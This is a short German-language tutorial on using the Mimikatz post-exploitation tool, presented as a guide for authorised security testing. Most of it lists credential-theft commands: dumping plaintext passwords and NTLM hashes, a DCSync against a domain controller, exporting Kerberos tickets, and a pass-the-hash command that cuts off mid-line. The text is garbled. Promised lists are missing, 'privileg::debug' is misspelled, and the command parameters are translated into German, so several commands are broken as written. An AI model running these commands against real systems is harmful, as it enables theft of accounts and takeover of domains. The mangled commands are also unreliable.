Mimikatz ist ein leistungsfähiges Post-Exploitation-Tool, mit dem sich Klartext-Passwörter, Hashes, PIN-Codes und Kerberos-Tickets aus dem Speicher extrahieren lassen. Es wird häufig von Penetrationstestern und Sicherheitsexperten verwendet, um Systemschwachstellen zu bewerten. Dieser Leitfaden enthält eine schrittweise Anleitung zur Installation und Verwendung von Mimikatz für ethische Sicherheitstests.
Warnung: Die nicht autorisierte Verwendung von Mimikatz ist illegal. Vergewissern Sie sich, dass Sie eine Erlaubnis haben, bevor Sie es in irgendeiner Umgebung verwenden.
Stellen Sie vor der Installation von Mimikatz sicher, dass Sie die folgenden Voraussetzungen erfüllen:
Mimikatz ist ein Open-Source-Tool, das auf GitHub verfügbar ist. Um es herunterzuladen:
Alternativ dazu können Sie das Repository mit Git klonen:
git clone https://github.com/gentilkiwi/mimikatz.git
Da Mimikatz administrative Rechte erfordert, folgen Sie diesen Schritten, um es auszuführen:
cd path\to\mimikatz\x64
mimikatz.exe
# mimikatz
sehen.Bevor Sie die Anmeldeinformationen extrahieren, überprüfen Sie, ob Sie über ausreichende Rechte verfügen:
privileg::debug
Wenn Sie erfolgreich sind, sollten Sie sehen: Privileg '20' OK
Um Klartext-Passwörter aus dem Speicher auszulesen, verwenden Sie:
sekurlsa::logonpasswords
Dies zeigt Benutzernamen, Domäne und Passwörter im Klartext an, falls vorhanden.
NTLM-Hashes können für Pass-the-Hash-Angriffe verwendet werden. Um sie zu extrahieren, führen Sie aus:
lsadump::sam
Oder, für entfernte Systeme:
lsadump::dcsync /Domäne:Zieldomäne.com /Benutzer:Administrator
Zum Abrufen von Kerberos-Tickets aus dem System:
sekurlsa::tickets /export
Dies exportiert .kirbi-Dateien
, die für Pass-the-Ticket-Angriffe verwendet werden können.
Zur Authentifizierung mit einem NTLM-Hash anstelle eines Passworts:
sekurlsa::pth /benutzer:Administrator /domäne:beispiel.com /ntlm: